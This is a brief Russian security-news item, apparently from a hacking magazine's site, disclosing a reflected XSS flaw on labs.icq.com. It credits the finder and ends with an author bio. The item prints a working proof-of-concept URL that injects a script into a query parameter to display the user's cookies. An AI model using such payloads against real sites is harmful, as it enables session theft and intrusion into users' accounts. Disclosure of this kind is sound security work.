XSS в Icq.com

Найдена возможность выполнения произвольных скриптов в контексте сервера.

Открытие принадлежит: war_driver

http://labs.icq.com/compad/error.html?title=register&err=blocked_country&xtra=<script>javascript:alert(document.cookie);</script>

Анатолий Ализар: Бывший автор новостной ленты «Хакера». Увлекается современными технологиями, оружием, информационной безопасностью, носимой электроникой и в целом концепцией Internet of Things.
Похожие материалы